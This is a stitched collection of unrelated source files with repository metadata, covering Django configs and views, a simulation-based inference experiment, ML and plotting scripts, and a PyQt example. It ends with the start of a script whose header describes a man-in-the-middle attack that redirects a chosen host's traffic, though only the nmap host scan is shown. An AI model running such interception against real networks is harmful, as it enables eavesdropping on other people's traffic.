"maurizio.vetere@mail.polimi.it"
] | maurizio.vetere@mail.polimi.it |
ba6ca406d2ae588888b32ea75d43e5af2c5203b8 | 6f7169ca3a19b59d647b40abf339fee55c538a3d | /OnlineMovieBooking/OnlineMovieBooking/asgi.py | 9f4960d94a311c1ad1fd64aa89e8e4f9528311b5 | [] | no_license | Ajitkumar1995/Heptic_Project | 68ff9cac2844c1f80d86e3d7a574d6d1b81b56b6 | 781fc1cfd974510241dc8219fa19eca2c6332356 | refs/heads/main | 2023-05-07T06:36:50.718091 | 2021-05-24T04:30:42 | 2021-05-24T04:30:42 | 370,223,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | """
ASGI config for OnlineMovieBooking project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'OnlineMovieBooking.settings')
application = get_asgi_application()
| [
"noreply@github.com"
] | Ajitkumar1995.noreply@github.com |
e131515b865f5b46e241f0d1f1fda18484cb88c4 | b67e2546888b125701f31404f51f0b43fa98a354 | /mv_gaussian/low_dim_w_five_obs/run_script_snpe_c.py | 863ff35eac0f6ab94f824b08e671751038882e61 | [
"BSD-3-Clause",
"MIT"
] | permissive | SamuelWiqvist/snpla | a20607d8ca2dc4d74cacbc9cf14c22f58f64d501 | 9d586c5d09de3eecd2536485af6fc28a915443e4 | refs/heads/main | 2022-07-29T22:22:51.873914 | 2021-06-14T08:29:28 | 2021-06-14T08:29:28 | 337,367,769 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,193 | py | # Imports
import sys
import torch
import os
import numpy as np
import time
from torch.distributions.multivariate_normal import MultivariateNormal
from sbi.inference import SNPE_C, prepare_for_sbi
# Initial set up
lunarc = int(sys.argv[1])
dim = int(sys.argv[2])
seed = int(sys.argv[3])
seed_data = int(sys.argv[4])
hp_tuning = int(sys.argv[5]) # if hp_tuning = 0, no hyper-param tuning, else hp_tuning for that sample of the hp
# normal run: seed = 1:10, hp_tuning = 0
# hp search: seed = 11, hp_tuning = 1:10
print("Input args:")
print("Dim: " + str(dim))
print("seed: " + str(seed))
print("seed_data: " + str(seed_data))
# Set wd
print(os.getcwd())
# set the wd to the base folder for the project
if lunarc == 1:
os.chdir('/home/samwiq/snpla/seq-posterior-approx-w-nf-dev')
else:
os.chdir('/home/samuel/Documents/projects/seq posterior approx w nf/seq posterior approx w nf dev')
sys.path.append('./')
print(os.getcwd())
id_job = str(dim) + '_' + str(seed) + '_' + str(seed_data)
if hp_tuning > 0:
id_job = id_job + "_" + str(hp_tuning)
# Load all utility functions for all methods
import mv_gaussian.low_dim_w_five_obs.functions as func
print(hp_tuning)
print(func.sample_hp("snpe_c", hp_tuning))
print(torch.rand(1))
print(func.sample_hp("snpe_c", hp_tuning)[0].item())
print(torch.rand(1))
# Set model and generate data
x_o, conj_model, analytical_posterior = func.set_up_model(seed)
def simulator(theta):
N_samples = theta.shape[0]
x = torch.zeros(N_samples, conj_model.N, dim)
for i in range(N_samples):
model_tmp = MultivariateNormal(theta[i], conj_model.model.covariance_matrix)
x[i, :, :] = model_tmp.rsample(sample_shape=(conj_model.N,))
# return calc_summary_stats(x), theta #/math.sqrt(5) # div with std of prior to nomarlize data
return func.flatten(x)
# check simulator and prior
simulator, prior = prepare_for_sbi(simulator, conj_model.prior)
# function that builds the network
def build_custom_post_net(batch_theta, batch_x):
flow_lik, flow_post = func.set_up_networks()
return flow_post
inference = SNPE_C(simulator, prior, density_estimator=build_custom_post_net)
learning_rate = 0.0005 # default value
if hp_tuning > 0:
learning_rate = func.sample_hp("snl", hp_tuning)[0].item()
start = time.time()
torch.manual_seed(seed)
np.random.seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
num_rounds = 10
x_o = x_o.flatten()
posteriors = []
proposal = None
for i in range(num_rounds):
posterior = inference(num_simulations=2500, proposal=proposal, max_num_epochs=100, learning_rate=learning_rate)
posteriors.append(posterior)
proposal = posterior.set_default_x(x_o)
end = time.time()
run_time = end - start
print("")
print("Runtime:" + str(round(run_time, 2)))
kl_divs_trained = []
start = time.time()
for i in range(num_rounds):
print(i)
posterior_sample = posteriors[i].sample((1000,), x=x_o)
kl_divs_trained.append(conj_model.kl_div(analytical_posterior, posterior_sample))
if hp_tuning == 0:
np.savetxt('mv_gaussian/low_dim_w_five_obs/data/post_samples_snpec_' + str(i + 1) + "_" + id_job + '.csv',
posterior_sample.detach().numpy(), delimiter=",")
else:
np.savetxt('mv_gaussian/low_dim_w_five_obs/hp_tuning/post_samples_snpec_' + str(i + 1) + "_" + id_job + '.csv',
posterior_sample.detach().numpy(), delimiter=",")
end = time.time()
run_time_inference = (end - start) / num_rounds
# Write results
if hp_tuning == 0:
with open('mv_gaussian/low_dim_w_five_obs/results/snpec_' + id_job + '.txt', 'w') as f:
f.write('%.4f\n' % run_time)
f.write('%.4f\n' % run_time_inference)
for i in range(num_rounds):
f.write('%.4f\n' % kl_divs_trained[i])
else:
with open('mv_gaussian/low_dim_w_five_obs/hp_tuning/snpec_' + id_job + '.txt', 'w') as f:
f.write('%.4f\n' % hp_tuning)
f.write('%.6f\n' % learning_rate)
f.write('%.4f\n' % run_time)
f.write('%.4f\n' % run_time_inference)
for i in range(num_rounds):
f.write('%.4f\n' % kl_divs_trained[i])
| [
"swiqvist@gmail.com"
] | swiqvist@gmail.com |
4326b1fe39257d8c8cb75d3879444c596e400404 | a8df0f25f9d9ce3be141edb70c670b0c3e53bff2 | /1_python_basic_homework/20200714_8/1_final.py | 028a3ac98670db77b9dc805483e8077cae2eb104 | [] | no_license | IMTHERX/qytangpython | 8d99c25a68f66adf86c328ed98397bdc1a4e5992 | abfefbdaf559bcf1b9d0927480a26d1fce3aa729 | refs/heads/master | 2022-11-20T05:18:31.273526 | 2020-07-22T14:32:23 | 2020-07-22T14:32:23 | 272,198,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | #!/usr/bin/python3.6
# -*- coding=utf-8 -*-
# qytang Python V4
# WangTao
import os
import re
import time
while True:
# 输入netstat -tulnp,查看端口信息
netstat_result = os.popen('netstat -tulnp').read()
# 直接用findall检测需要的端口信息,findall比较灵活,不像match,IPv6定义需要区别处理,否则报错
# 匹配的信息,存储为(协议,端口号)
re_netstat_result = re.findall('(\S+)\s*\d{1,3}\s*\d{1,3}\s*' # 获取TCP/UDP
'\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}:(\d{1,5})\s*' #获取端口信息
'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\S+\s*'
'\w+\s*\d+\/\S+', netstat_result)
check_pro_prot = ('tcp','80') # 定义判断的基准(协议,端口号)
if check_pro_prot in re_netstat_result: # 如果(协议,端口号) = ('tcp','80') 则为真
print('HTTP(TCP/80)服务已经被打开')
break # 停止检测
else:
print('等待一秒重新开始监控!')
time.sleep(1) # 等待1秒重新检测 | [
"imtherx@foxmail.com"
] | imtherx@foxmail.com |
c8aa130be7fae098e4c52b4cee2c663da7e8857d | 50ba981bc65efea92f61c698cecfbbe3214a724e | /Django_DB_Backup/App/views.py | f634d2abf55cd3aa4e2af403c7b5c2c6d7ea4e24 | [] | no_license | shubhamjain31/demorepo | ff0a4283fc866ea94df1c340da430271daf93cb6 | 90639b8622e68155ff19bfec0bb6925b421f04cf | refs/heads/master | 2023-04-27T03:42:10.057387 | 2022-06-28T06:14:44 | 2022-06-28T06:14:44 | 229,792,545 | 1 | 0 | null | 2023-04-21T21:36:24 | 2019-12-23T17:04:22 | Python | UTF-8 | Python | false | false | 2,012 | py | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from itertools import chain
from django.contrib.auth.models import User
from django.views.decorators.csrf import csrf_exempt
from django.core import serializers
from django.contrib.admin.utils import NestedObjects
from django.core.management import call_command
import re
from App.models import *
# Create your views here.
def index(request):
return render(request, 'index.html')
def dbtable(request):
all_users = User.objects.all()
params = {'all_users':all_users}
return render(request, 'backupandrestore.html', params)
@csrf_exempt
def create_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# NestedObjects is admin contrib package which is used as a Collector subclass.
collector = NestedObjects(using="default") # database name
# create an object of NestedObjects
collector.collect([user_obj])
# create a list of all objects of all tables with foreign keys
objects = list(chain.from_iterable(collector.data.values()))
# store a data in file
with open("dbfiles/{}.json".format(user_obj.username), "w") as f:
s = serializers.serialize("json", objects, use_natural_foreign_keys=True, use_natural_primary_keys=True, indent = 4)
# make all tables objects pks null
# s = re.sub('"pk": [0-9]{1,5}', '"pk": null', s)
f.write(s)
data = {
'msg': 'Backup Created Successfully'
}
return JsonResponse(data)
@csrf_exempt
def restore_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# delete all relation of user object
Post.objects.filter(author=user_obj).delete()
Description.objects.filter(post_desc=user_obj).delete()
# file name
filename = "dbfiles/{}.json".format(user_obj.username)
# use call command for restore a data
call_command('loaddata', '{}'.format(filename))
data = {
'msg': 'Restore Backup Successfully'
}
return JsonResponse(data) | [
"sj27754@gmail.com"
] | sj27754@gmail.com |
61a1b709182ecc68826a3e0857fb7517e0aedc0f | 3ca9b9956716dd5bfa36613f36dbfe09926028aa | /venv/bin/pip | cc39fc95f9c4cdf5b33bc19223e5c45e58760789 | [] | no_license | renadh12/Scraping | 456de4fd8db1a4bd8c128b1310b42557d9524118 | 3c276d0838bf10b9a55ef70d31490c1154f21832 | refs/heads/master | 2020-12-10T03:45:33.849883 | 2020-09-02T07:25:07 | 2020-09-02T07:25:07 | 233,493,335 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 404 | #!/Users/renadhc/PycharmProjects/scraping/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"renadhc@gmail.com"
] | renadhc@gmail.com | |
fbb615f20b16ddb6c6a9e8c616808e38774076cb | a88882f03f8cf6d2099b45b293ad131b410419d7 | /plot_metric_allModels.py | 692265814c308da59be76499b60cdce472978c38 | [
"MIT"
] | permissive | gustavovaliati/pti01eval | 01a744b35d26df3837e0cdbfa735ec7bf432fac5 | 1dd27fa59b6c5569eb39c26f919a27e1a788d563 | refs/heads/master | 2021-04-15T13:38:49.846300 | 2018-04-26T16:19:44 | 2018-04-26T16:19:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,579 | py | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import datetime, os
import numpy as np
from tqdm import tqdm
from PIL import Image
from chainercv.datasets import voc_bbox_label_names
from chainercv.evaluations import eval_detection_voc, calc_detection_voc_prec_rec
from chainercv.datasets.voc import voc_utils
FASTER_RCNN_BACKUP='backups/pred_fasterrcnn_pti01_7927_20180409_225704.npy'
SSD300_BACKUP='backups/pred_ssd300_pti01_7927_20180409_231419.npy'
SSD512_BACKUP='backups/pred_ssd512_pti01_7927_20180409_224650.npy'
YOLOV2_BACKUP='backups/pred_yolov2_pti01_7927_20180407_112556.npy'
IMAGES_PATH = '/home/gustavo/workspace/bbox-grv/Images/001/'
def buildRect(b, color):
topleft_y = b[0]
topleft_x = b[1]
bottomright_y = b[2]
bottomright_x = b[3]
return patches.Rectangle((topleft_x,topleft_y),bottomright_x - topleft_x, bottomright_y - topleft_y,linewidth=1,edgecolor=color,facecolor='none')
print('Reading predictions backup...')
fr_pred_bboxes,fr_pred_labels,fr_pred_scores,fr_gt_bboxes,fr_gt_labels,fr_images = np.load(FASTER_RCNN_BACKUP)
s3_pred_bboxes,s3_pred_labels,s3_pred_scores,s3_gt_bboxes,s3_gt_labels,s3_images = np.load(SSD300_BACKUP)
s5_pred_bboxes,s5_pred_labels,s5_pred_scores,s5_gt_bboxes,s5_gt_labels,s5_images = np.load(SSD512_BACKUP)
tmp_yl_pred_bboxes,tmp_yl_pred_labels,tmp_yl_pred_scores,tmp_yl_gt_bboxes,tmp_yl_gt_labels,tmp_yl_images = np.load(YOLOV2_BACKUP)
print('Sucessfuly loaded')
print('Fixing yolo positions')
yl_pred_bboxes,yl_pred_labels,yl_pred_scores,yl_gt_bboxes,yl_gt_labels,yl_images = [],[],[],[],[],[]
for correct_index, fr_img in enumerate(fr_images):
curr_index = tmp_yl_images.tolist().index(fr_img.replace('\n',''))
yl_pred_bboxes.append(tmp_yl_pred_bboxes[curr_index])
yl_pred_labels.append(tmp_yl_pred_labels[curr_index])
yl_pred_scores.append(tmp_yl_pred_scores[curr_index])
yl_gt_bboxes.append(tmp_yl_gt_bboxes[curr_index])
yl_gt_labels.append(tmp_yl_gt_labels[curr_index])
yl_images.append(tmp_yl_images[curr_index])
print('Gerenrating plots...')
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
fig_dir = 'plottings/metrics/all_models/{}_{}_{}/'.format('PTI01', len(fr_images),now)
os.makedirs(fig_dir, exist_ok=True)
print('Saving metric in {}.'.format(fig_dir))
print('YOLOv2')
yl_prec, yl_rec = calc_detection_voc_prec_rec(
yl_pred_bboxes, yl_pred_labels, yl_pred_scores,
yl_gt_bboxes, yl_gt_labels, gt_difficults=None, iou_thresh=0.5)
yl_person_prec = yl_prec[voc_utils.voc_bbox_label_names.index('person')]
yl_person_rec = yl_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(yl_person_prec), np.average(yl_person_rec)))
plt.step(yl_person_rec, yl_person_prec, label='YOLOv2')
print('SSD512')
s5_prec, s5_rec = calc_detection_voc_prec_rec(
s5_pred_bboxes, s5_pred_labels, s5_pred_scores,
s5_gt_bboxes, s5_gt_labels, gt_difficults=None, iou_thresh=0.5)
s5_person_prec = s5_prec[voc_utils.voc_bbox_label_names.index('person')]
s5_person_rec = s5_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(s5_person_prec), np.average(s5_person_rec)))
plt.step(s5_person_rec, s5_person_prec, label='SSD512')
print('Faster R-CNN')
fr_prec, fr_rec = calc_detection_voc_prec_rec(
fr_pred_bboxes, fr_pred_labels, fr_pred_scores,
fr_gt_bboxes, fr_gt_labels, gt_difficults=None, iou_thresh=0.5)
fr_person_prec = fr_prec[voc_utils.voc_bbox_label_names.index('person')]
fr_person_rec = fr_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(fr_person_prec), np.average(fr_person_rec)))
plt.step(fr_person_rec, fr_person_prec, label='Faster R-CNN')
print('SSD300')
s3_prec, s3_rec = calc_detection_voc_prec_rec(
s3_pred_bboxes, s3_pred_labels, s3_pred_scores,
s3_gt_bboxes, s3_gt_labels, gt_difficults=None, iou_thresh=0.5)
s3_person_prec = s3_prec[voc_utils.voc_bbox_label_names.index('person')]
s3_person_rec = s3_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(s3_person_prec), np.average(s3_person_rec)))
plt.step(s3_person_rec, s3_person_prec, label='SSD300')
plt.legend()
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.ylim([0.0, 1.0])
plt.xlim([0.0, 1.0])
plt.gca().xaxis.set_major_locator(plt.MaxNLocator(10))
plt.gca().yaxis.set_major_locator(plt.MaxNLocator(10))
plt.savefig(os.path.join(fig_dir, 'recprec__precision_recall_curve.jpg'), bbox_inches='tight')
plt.show()
plt.close()
| [
"gustavovaliati@gmail.com"
] | gustavovaliati@gmail.com |
051d133913f7b59c2ae435cf1b51db34072f09c4 | b34626709275615f893ea6bf37dab47a29427e63 | /src/whales/modules/pipelines/instructions_sets.py | 59c733aee39ae4d12f352b188795890dd35a8348 | [] | no_license | sergiolib/whales-backend | 176c3995e025554ae97f880e9870edccc3ce5921 | 85709bbdc6a71f5321a53f1d129eaec15af9a067 | refs/heads/master | 2022-12-31T07:57:19.975268 | 2018-07-09T21:48:50 | 2018-07-09T21:48:50 | 303,654,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,421 | py | """Computing heavy instructions for generating step results throughout the pipeline"""
import logging
import pandas as pd
from os.path import join
from whales.modules.data_files.audio import AudioDataFile
from whales.modules.data_files.feature import FeatureDataFile
from whales.modules.pipelines import getters
class InstructionSet:
def __init__(self, logger=None):
self.logger = logger
if self.logger is None:
self.logger = logging.getLogger(self.__class__.__name__)
class SupervisedWhalesInstructionSet(InstructionSet):
def set_params(self, params: dict):
return params
def build_data_file(self, params: dict):
""""""
available_data_files = getters.get_available_data_files()
available_formatters = getters.get_available_formatters()
# Load every small input data file and concatenate all into the big data file
dfs = []
for elem in params["input_data"]:
self.logger.info(f"Loading and appending file {elem['file_name']}")
file_name = elem["file_name"]
data_file_name = elem["data_file"]
formatter_name = elem["formatter"]
df = available_data_files[data_file_name]()
fmt = available_formatters[formatter_name]()
df.load(file_name=file_name, formatter=fmt)
dfs.append(df)
big_df = AudioDataFile().concatenate(dfs)
return {"input_data": big_df}
def set_labels(self, params: dict):
labels_params = params["input_labels"]
input_data = params["input_data"]
lf = getters.get_available_labels_formatters()
for p in labels_params:
self.logger.info(f"Setting labels in file {p['labels_file']}")
file_name = p["labels_file"]
labels_formatter = lf[p["labels_formatter"]]()
input_data.load_labels(file_name, labels_formatter, label="whale")
return {}
def add_features_extractor(self, params: dict):
added_features_extractors = params.get("features_extractors", [])
added_features_extractors.append(params["features_extractor"])
return {"features_extractors": added_features_extractors}
def add_performance_indicator(self, params: dict):
added_performance_indicators = params.get("performance_indicators", [])
added_performance_indicators.append(params["performance_indicator"])
return {"performance_indicators": added_performance_indicators}
def add_pre_processing_method(self, params: dict):
added_pp_method = params.get("pre_processing_methods", [])
added_pp_method.append(params["pp_method"])
return {"pre_processing_methods": added_pp_method}
def set_machine_learning_method(self, params: dict):
return {"ml_method": params["ml_method"]}
def train_machine_learning_method(self, params: dict):
ml_method = params["ml_method"]
df = params["transformed_training_set"]
self.logger.info(f"Training method {params['ml_method'].__class__.__name__} with {len(df.data)} data points")
ml_method.parameters["data"] = df
ml_method.fit()
return {}
def save_trained_ml_method(self, params: dict):
ml_method = params["ml_method"]
dir = params["trained_models_directory"]
ml_method.save(join(dir, "ml_model.mdl"))
return {}
def train_performance_indicators(self, params: dict):
pi = params["performance_indicators"]
df = params["training_set"]
for p in pi:
self.logger.info(f"Training performance indicator {p.__class__.__name__} with {len(df.data)} data points")
p.fit(df)
return {}
def train_features(self, params: dict):
feat = params["features_extractors"]
df = params["training_set"]
for f in feat:
f.parameters["data"] = df
self.logger.info(f"Training features extractor {f.__class__.__name__} with {len(df.data)} data points")
f.fit()
return {}
def save_trained_features_extractors(self, params: dict):
feat = params["features_extractors"]
location = params["trained_models_directory"]
for i, f in enumerate(feat):
cur_loc = join(location, f'feature_{i}.mdl')
self.logger.info(f"Saving features extractor {f.__class__.__name__} to {cur_loc}")
f.save(cur_loc)
return {}
def load_trained_features_extractors(self, params: dict):
feat = params["features_extractors"]
location = params["trained_models_directory"]
for i, f in enumerate(feat):
cur_loc = join(location, f'feature_{i}.mdl')
self.logger.info(f"Loading features extractor {f.__class__.__name__} from {cur_loc}")
f.load(cur_loc)
return {}
def transform_features(self, params: dict):
feat = params["features_extractors"]
current_set = {}
transformed_set = {}
available_sets = [i
for i in params if i.endswith("_set") and not "prediction_" in i and not "transformed_" in i]
ret = {}
for s in available_sets:
df = current_set[s] = params[s]
transformed_set[s] = []
for f in feat:
f.parameters["data"] = df
msg = f"Transforming features extractor {f.__class__.__name__} with {len(df.data)} data points " \
f"for {s} set"
self.logger.info(msg)
res = f.transform()
transformed_set[s].append(res)
transformed_set[s] = FeatureDataFile().concatenate(transformed_set[s])
transformed_set[s].data.index = current_set[s].data.index
labels = current_set[s].metadata["labels"]
transformed_set[s].metadata["labels"] = labels
ret["transformed_" + s] = transformed_set[s]
return ret
def transform_pre_processing(self, params: dict):
pre_processing_methods = params["pre_processing_methods"]
input_data = params["input_data"]
data = input_data
for pp in pre_processing_methods:
pp.parameters["data"] = data
self.logger.info(f"Applying pre processing {pp.__class__.__name__} to {len(data.data)} data points")
data = pp.transform()
return {"input_data": data}
def predict_machine_learning_method(self, params: dict):
ml_method = params["ml_method"]
results = {}
available_sets = [i for i in params if i.endswith("_set") and i.startswith("transformed_")]
for dset in available_sets:
df = params[dset]
ml_method.parameters["data"] = df
msg = f"Predicting method {ml_method.__class__.__name__} to {len(df.data)} data points of {dset}"
self.logger.info(msg)
prediction = ml_method.predict()
results["prediction_" + dset] = prediction
return results
def load_trained_machine_learning_method(self, params: dict):
ml_method = params["ml_method"]
location = params["trained_models_directory"]
cur_loc = join(location, 'ml_model.mdl')
self.logger.info(f"Loading machine learning method {ml_method} from {cur_loc}")
ml_method.load(cur_loc)
return {}
def compute_performance_indicators(self, params: dict):
pi = params["performance_indicators"]
ns = params["number_of_sets"]
results = {}
available_sets = [i for i in params if i.endswith("_set") and i.startswith("transformed_")]
for dset in available_sets:
predicted_labels = None
target_labels = None
label_names = {}
for i in range(ns):
this_run_params = params[f"{i + 1}/{ns}"]
df = this_run_params[dset]
if "prediction_" + dset in this_run_params:
if predicted_labels is None:
predicted_labels = pd.Series(this_run_params["prediction_" + dset])
else:
predicted_labels = predicted_labels.append(pd.Series(this_run_params[f"prediction_" + dset]))
if "labels" in df.metadata:
if target_labels is None:
target_labels = df.metadata["labels"]
else:
target_labels = target_labels.append(df.metadata["labels"])
label_names.update(df.label_name)
for i in pi:
i.parameters = {
"target": list(map(lambda x: label_names[x], target_labels)),
"prediction": list(map(lambda x: label_names[x], predicted_labels)),
"classes": [i[1] for i in label_names.items()]
}
self.logger.info(f"Performance indicators {i.__class__.__name__} of results from {dset}")
res = i.compute()
results[f"{i.__class__.__name__}_{dset}"] = res
return results
def save_computed_performance_indicators(self, params: dict):
pi = params["performance_indicators"]
# Save methods and results
location = params["trained_models_directory"]
for i, p in enumerate(pi):
cur_loc = join(location, f'{p}')
self.logger.info(f"Saving performance indicator {p}")
p.save(cur_loc)
return {}
def save_performance_indicators_results(self, params: dict):
pi = params["performance_indicators"]
# Save methods and results
location = params["results_directory"]
for i, p in enumerate(pi):
cur_loc = join(location, f'{p}')
self.logger.info(f"Saving performance indicator {p}")
p.save_results(cur_loc)
return {}
def build_data_set(self, params: dict):
self.logger.info("Building data set")
available_data_sets = getters.get_available_data_sets()
method = params["ds_options"]["method"]
ds_cls = available_data_sets[method]
ds = ds_cls()
data_file = params["input_data"]
ds.add_data_file(data_file)
data_generator = ds.get_data_sets()
number_of_sets = ds.iterations
return {"data_generator": data_generator, "number_of_sets": number_of_sets}
def train_execute_methods(self, params: dict):
data_generator = params["data_generator"]
number_of_sets = params["number_of_sets"]
# All iterations results dictionary
results = {}
# Iterate on sets
for iteration, data in enumerate(data_generator):
training, testing, validation = data
# Set current sets
params["training_set"] = training
params["testing_set"] = testing
params["validation_set"] = validation
# Train features extractors
params.update(self.train_features(params))
# Save trained features extractors
params.update(self.save_trained_features_extractors(params))
# Transform data
params.update(self.transform_features(params))
# Train machine learning method
params.update(self.train_machine_learning_method(params))
# Train performance indicators
# params.update(self.train_performance_indicators(params))
# Predict with machine learning method
params.update(self.predict_machine_learning_method(params))
# Store results
results[f"{iteration + 1}/{number_of_sets}"] = params.copy()
# Save ml_method
params.update(self.save_trained_ml_method(params))
# Compute performance indicators
params.update(self.compute_performance_indicators({**results, **params}))
# Save performance indicators to disk
params.update(self.save_computed_performance_indicators(params))
# Save performance indicators results to disk
params.update(self.save_performance_indicators_results(params))
return results
def train_methods(self, params: dict):
data_generator = params["data_generator"]
results = dict()
# Iterate on single set
for iteration, training in enumerate(data_generator):
# Set current sets
params["training_set"] = training
# Train features extractors
params.update(self.train_features(params))
# Save trained features extractors
params.update(self.save_trained_features_extractors(params))
# Transform data
params.update(self.transform_features(params))
# Train machine learning method
params.update(self.train_machine_learning_method(params))
# Store results
results["1/1"] = params.copy()
# Save ml_method
params.update(self.save_trained_ml_method(params))
return results
def predict_methods(self, params: dict):
data_generator = params["data_generator"]
results = dict()
# Iterate on single set
for iteration, predicting_set in enumerate(data_generator):
# Set current sets
params["predicting_set"] = predicting_set
# Load trained features extractors
params.update(self.load_trained_features_extractors(params))
# Load trained machine learning method
params.update(self.load_trained_machine_learning_method(params))
# Transform data
params.update(self.transform_features(params))
# Train machine learning method
params.update(self.predict_machine_learning_method(params))
# Train performance indicators
# params.update(self.train_performance_indicators(params))
# Store results
results["1/1"] = params.copy()
# Compute performance indicators
self.compute_performance_indicators({**results, **params})
# Save performance indicators to disk
params.update(self.save_computed_performance_indicators(params))
# Save performance indicators results to disk
params.update(self.save_performance_indicators_results(params))
return results
| [
"sliberman@alges.cl"
] | sliberman@alges.cl |
84dbaf5645dcb48cc98a675f32511a1a18a0cab1 | ed029a779487f996df1ffc5873696542f084061d | /examples/chart_roi.py | ac96463c331677210d8eb973525bf159c7943c35 | [
"MIT"
] | permissive | haseeb00001/qplotutils | 1d4cee4744602d64b53398de9a81c073b203cb15 | 20156e35831608629936d0da5c9047f74ca5ccf5 | refs/heads/master | 2021-01-01T16:59:34.047898 | 2017-02-07T05:50:33 | 2017-02-07T05:50:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | #!/usr/bin/python
"""
Region of interest
------------------
Example for a region of interest (ROI) with different handles.
"""
import logging
import os
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
PKG_DIR = os.path.abspath(os.path.join(__file__, "..", ".."))
print(PKG_DIR)
if PKG_DIR not in sys.path:
sys.path.append(PKG_DIR)
from qplotutils.chart.roi import RectangularRegion, ResizeHandle, HandlePosition, RotateHandle
from qplotutils.chart.view import ChartView
__author__ = "Philipp Baust"
__copyright__ = "Copyright 2015, 2017, Philipp Baust"
__credits__ = []
__license__ = "MIT"
__version__ = "0.0.1"
__maintainer__ = "Philipp Baust"
__email__ = "philipp.baust@gmail.com"
__status__ = "Development"
_log = logging.getLogger(__name__)
_log.setLevel(logging.INFO)
if __name__ == "__main__":
""" Minimal example showing a bench with 2 docks.
The docks can be resized and dragged around.
"""
logging.basicConfig(level=logging.DEBUG)
qapp = QApplication([])
view = ChartView(orientation=ChartView.CARTESIAN)
view.setWindowTitle("ROI Test")
view.resize(500, 500)
view.setAspectRatio(1.0)
view.centralWidget.area.setRange(QRectF(-7, -7, 14, 14))
# view.visibleRegion()
view.show()
roi = RectangularRegion(1, 0, 2, 1, 0.)
roi.addHandle(ResizeHandle(roi, position=HandlePosition.TOP))
roi.addHandle(ResizeHandle(roi, position=HandlePosition.LEFT))
roi.addHandle(ResizeHandle(roi, position=HandlePosition.BOTTOM))
roi.addHandle(ResizeHandle(roi, position=HandlePosition.RIGHT))
roi.addHandle(RotateHandle(roi, position=HandlePosition.RIGHT | HandlePosition.TOP))
view.addItem(roi)
def contextMenu(pos):
menu = QMenu()
def remove_handle():
h = roi.handles[1]
roi.removeHandle(h)
def rotate_90():
roi.setRotation(roi.rotation() + 82.)
rm_action = QAction('Remove handle', view)
rm_action.triggered.connect(remove_handle)
ro_action = QAction('Rotate by 82', view)
ro_action.triggered.connect(rotate_90)
menu.addAction(rm_action)
menu.addAction(ro_action)
menu.exec_(view.mapToGlobal(pos))
view.customContextMenuRequested.connect(contextMenu)
qapp.exec_() | [
"philipp.baust@gmail.com"
] | philipp.baust@gmail.com |
29f5a4ba9b7219b748f52e07f89157085e7a71a9 | 60c39402b6c957e5dfae0c63b5d7af13d9ba9350 | /man_in_the_middle.py | 8bd0947f1e8e9f0ddc3b0bb140e90309fd35c323 | [] | no_license | palex88/deauth | 91747ac1a0143c7601351ebdd874b5e748380d06 | 70365da4841b75d46223cb84aa154705aa482fdb | refs/heads/master | 2020-03-10T23:39:30.274222 | 2018-05-07T05:38:47 | 2018-05-07T05:38:47 | 129,645,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,989 | py | # !usr/bin/env/python
#
# File: man_in_the_middle.py
# Author: Alex Thompson
# Github: palex88@github.com
# Python Version: 2.7
# Purpose: This script runs a man in the middle attack. It finds the local network IP and MAC addresses, then displays
# to the user all the devices connected to the network. Once the user chooses one of them, the script uses
# scapy to send packets to the AP and the chosen host to route traffic between the AP and the host through
# the machine the script is running on.
#
# Usage: python man_in_the_middle.py
#
# Input: None
# Output: None
#
# Resources:
# https://scapy.readthedocs.io/en/latest/usage.html?highlight=srp
# https://github.com/hotzenklotz/WhoIsHome/blob/master/whoIsHome.py
# https://github.com/glebpro/Man-in-the-Middle/blob/master/m.py
# https://null-byte.wonderhowto.com/how-to/build-man-middle-tool-with-scapy-and-python-0163525/
#
import os
import sys
import time
import socket
import subprocess32
import nmap
from scapy import *
from scapy import all
def scan():
"""
Scans for hosts on a local network and returns hosts IP and MAC addresses.
Return:
Dict with IP and MAC address for all hosts.
"""
host_list = str(get_lan_ip()) + "/24"
nmap_args = "-sn"
scanner = nmap.PortScanner()
scanner.scan(hosts=host_list, arguments=nmap_args)
host_list = []
for ip in scanner.all_hosts():
host = {"ip" : ip}
if "hostname" in scanner[ip]:
host["hostname"] = scanner[ip]["hostname"]
if "mac" in scanner[ip]["addresses"]:
host["mac"] = scanner[ip]["addresses"]["mac"].upper()
host_list.append(host)
return host_list
def get_lan_ip():
"""
Scans for local IP addresses on the local network.
"""
try:
